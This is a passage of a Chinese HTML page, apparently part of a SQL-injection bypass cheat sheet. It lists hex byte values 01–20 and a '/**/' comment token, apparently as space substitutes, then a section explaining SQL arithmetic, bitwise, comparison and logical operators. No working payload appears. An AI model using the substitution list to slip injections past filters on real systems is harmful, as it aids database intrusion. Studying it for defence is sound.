    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">01</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">02</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">03</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">04</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">05</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">06</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">07</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">08</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">09</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0A</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0B</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0C</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0D</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0E</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0F</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">10</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">11</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">12</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">13</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">14</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">15</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">16</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">17</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">18</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">19</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1A</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1B</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1C</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1D</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1E</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1F</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">20</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/**/</span></code></span></span></p></li>
   </ol>

0x02 运算符号

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">加法运算</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">-</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">减法运算</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">乘法运算</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">除法运算,如果两个表达式值都是整数,那么结果只取整数值,小数值将略去</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">%</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">取模运算,返回两数相除后的余数</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">&</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">位与逻辑运算,从两个表达式中取对应的位。当且仅当输入表达式中两个位的值都为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">时,结果中的位才被设置为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,否则,结果中的位被设置为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">|</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">位或逻辑运算,从两个表达式中取对应的位。如果输入表达式中两个位只要有一个的值为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">时,结果的位就被设置为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,只有当两个位的值都为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">时,结果中的位才被设置为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">^</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">位异或运算,从两个表达式中取对应的位。如果输入表达式中两个位只有一个的值为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">时,结果中的位就被设置为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;只有当两个位的值都为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">或</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">时,结果中的位才被设置为</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">等于</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"><></span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不等于</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">></span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">大于</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">!=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不等于</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"><</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">小于</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">!<</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不小于</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">>=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">大于或等于</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">!></span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不大于</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"><=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">小于或等于</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">ALL </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果一组的比较都为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则比较结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">AND </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果两个布尔表达式都为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;如果其中一个表达式为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">false</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">false</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">ANY </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果一组的比较中任何一个为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,则结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">BETWEEN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果操作数在某个范围之内,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXISTS </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果子查询中包含了一些行,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">IN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">如果操作数等于表达式列表中的一个,那么结果为</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">true</span></code></span></span></p></li>
